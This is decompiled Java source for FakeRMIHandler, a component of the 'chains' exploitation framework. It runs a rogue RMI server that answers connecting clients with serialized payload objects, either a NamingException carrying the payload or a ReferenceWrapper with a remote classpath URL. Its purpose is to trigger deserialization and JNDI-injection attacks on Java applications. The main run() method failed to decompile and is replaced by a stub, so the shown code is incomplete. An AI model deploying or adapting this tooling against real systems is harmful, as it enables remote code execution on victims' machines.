package com.ar3h.chains.core.exploit.component;

import com.ar3h.chains.common.util.Reflections;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.UID;
import java.util.Arrays;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javax.naming.NamingException;
import javax.net.ServerSocketFactory;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/exploit/component/FakeRMIHandler.class */
public class FakeRMIHandler {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) FakeRMIHandler.class);
    private final int port;
    private final Object payloadObject;
    private final ServerSocket ss;
    private final Object waitLock = new Object();
    private boolean exit;
    private boolean hadConnection;
    private URL classpathUrl;
    private String identity;

    /* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/exploit/component/FakeRMIHandler$Dummy.class */
    public static class Dummy implements Serializable {
        private static final long serialVersionUID = 1;
    }

    public FakeRMIHandler(int i, Object obj) throws NumberFormatException, IOException {
        this.port = i;
        this.payloadObject = obj;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
        this.identity = "RMIServer " + i;
    }

    public FakeRMIHandler(int i, String str, URL url) throws IOException {
        this.port = i;
        this.payloadObject = makeDummyObject(str);
        this.classpathUrl = url;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }

    public boolean waitFor(int i) {
        try {
            if (this.hadConnection) {
                return true;
            }
            log.info("Waiting for connection");
            synchronized (this.waitLock) {
                this.waitLock.wait(i);
            }
            return this.hadConnection;
        } catch (InterruptedException e) {
            return false;
        }
    }

    public void close() {
        this.exit = true;
        try {
            this.ss.close();
            log.info("Fake RMI Listener stopped");
        } catch (IOException e) {
        }
        synchronized (this.waitLock) {
            this.waitLock.notify();
        }
    }

    /* JADX WARN: Finally extract failed */
    /* JADX WARN: Removed duplicated region for block: B:62:0x01d7 A[Catch: SocketException -> 0x020a, Exception -> 0x020e, TryCatch #6 {SocketException -> 0x020a, Exception -> 0x020e, blocks: (B:3:0x0002, B:5:0x0009, B:8:0x0015, B:11:0x005b, B:21:0x00a2, B:22:0x00c7, B:28:0x00e0, B:30:0x00ee, B:31:0x0106, B:37:0x00fa, B:32:0x0120, B:33:0x0153, B:34:0x0160, B:24:0x0130, B:25:0x0141, B:16:0x0089, B:17:0x0090, B:40:0x0053, B:48:0x0173, B:50:0x0189, B:51:0x018d, B:53:0x0194, B:57:0x019d, B:58:0x01a7, B:43:0x01bb, B:44:0x01be, B:45:0x01cf, B:62:0x01d7, B:63:0x01db, B:65:0x01e2, B:72:0x01f2, B:73:0x01f6, B:75:0x01fd, B:77:0x0206), top: B:2:0x0002 }] */
    /* JADX WARN: Removed duplicated region for block: B:65:0x01e2 A[Catch: SocketException -> 0x020a, Exception -> 0x020e, TryCatch #6 {SocketException -> 0x020a, Exception -> 0x020e, blocks: (B:3:0x0002, B:5:0x0009, B:8:0x0015, B:11:0x005b, B:21:0x00a2, B:22:0x00c7, B:28:0x00e0, B:30:0x00ee, B:31:0x0106, B:37:0x00fa, B:32:0x0120, B:33:0x0153, B:34:0x0160, B:24:0x0130, B:25:0x0141, B:16:0x0089, B:17:0x0090, B:40:0x0053, B:48:0x0173, B:50:0x0189, B:51:0x018d, B:53:0x0194, B:57:0x019d, B:58:0x01a7, B:43:0x01bb, B:44:0x01be, B:45:0x01cf, B:62:0x01d7, B:63:0x01db, B:65:0x01e2, B:72:0x01f2, B:73:0x01f6, B:75:0x01fd, B:77:0x0206), top: B:2:0x0002 }] */
    /*
        Code decompiled incorrectly, please refer to instructions dump.
        To view partially-correct add '--show-bad-code' argument
    */
    public void run() {
        /*
            Method dump skipped, instructions count: 535
            To view this dump add '--comments-level debug' option
        */
        throw new UnsupportedOperationException("Method not decompiled: com.ar3h.chains.core.exploit.component.FakeRMIHandler.run():void");
    }

    private void doMessage(Socket socket, DataInputStream dataInputStream, DataOutputStream dataOutputStream, Object obj) throws Exception {
        log.info("    Reading message...", this.identity);
        int read = dataInputStream.read();
        switch (read) {
            case 80:
                doCall(dataInputStream, dataOutputStream, obj);
                break;
            case 81:
            case 83:
            default:
                throw new IOException("unknown transport op " + read);
            case 82:
                dataOutputStream.writeByte(83);
                break;
            case 84:
                UID.read(dataInputStream);
                break;
        }
        socket.close();
    }

    private void doCall(DataInputStream dataInputStream, DataOutputStream dataOutputStream, Object obj) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(dataInputStream) { // from class: com.ar3h.chains.core.exploit.component.FakeRMIHandler.1
            @Override // java.io.ObjectInputStream
            protected Class<?> resolveClass(ObjectStreamClass objectStreamClass) throws IOException, ClassNotFoundException {
                if ("[Ljava.rmi.server.ObjID;".equals(objectStreamClass.getName())) {
                    return ObjID[].class;
                }
                if ("java.rmi.server.ObjID".equals(objectStreamClass.getName())) {
                    return ObjID.class;
                }
                if ("java.rmi.server.UID".equals(objectStreamClass.getName())) {
                    return UID.class;
                }
                throw new IOException("Not allowed to read object");
            }
        };
        try {
            ObjID read = ObjID.read(objectInputStream);
            if (read.hashCode() == 2) {
                objectInputStream.readInt();
                objectInputStream.readLong();
                log.info("    Is DGC call for " + Arrays.toString((ObjID[]) objectInputStream.readObject()), this.identity);
            }
            log.info("    Sending return with payload for obj " + read, this.identity);
            dataOutputStream.writeByte(81);
            MarshalOutputStream marshalOutputStream = new MarshalOutputStream(dataOutputStream, this.classpathUrl);
            if (obj instanceof ReferenceWrapper) {
                packReferenceObject(marshalOutputStream, obj);
            } else {
                packExceptionObject(marshalOutputStream, obj);
            }
            this.hadConnection = true;
            synchronized (this.waitLock) {
                this.waitLock.notifyAll();
            }
        } catch (IOException e) {
            throw new MarshalException("unable to read objID", e);
        }
    }

    private void packExceptionObject(ObjectOutputStream objectOutputStream, Object obj) throws Exception {
        log.info("    Send exception payload.", this.identity);
        objectOutputStream.writeByte(2);
        try {
            new UID().write(objectOutputStream);
            NamingException namingException = new NamingException();
            Reflections.setFieldValue(namingException, "resolvedObj", obj);
            objectOutputStream.writeObject(namingException);
            objectOutputStream.flush();
        } catch (Exception e) {
            log.error("payload serialize error，reason：" + e.getMessage());
            e.printStackTrace();
        }
    }

    private void packReferenceObject(ObjectOutputStream objectOutputStream, Object obj) throws IOException {
        log.info("    Send reference payload.", this.identity);
        objectOutputStream.writeByte(1);
        new UID().write(objectOutputStream);
        objectOutputStream.writeObject(obj);
        objectOutputStream.flush();
    }

    protected static Object makeDummyObject(String str) {
        try {
            ClassLoader classLoader = new ClassLoader() { // from class: com.ar3h.chains.core.exploit.component.FakeRMIHandler.2
            };
            ClassPool classPool = new ClassPool();
            classPool.insertClassPath(new ClassClassPath(Dummy.class));
            CtClass ctClass = classPool.get(Dummy.class.getName());
            ctClass.setName(str);
            return ctClass.toClass(classLoader).newInstance();
        } catch (Exception e) {
            e.printStackTrace();
            return new byte[0];
        }
    }
}
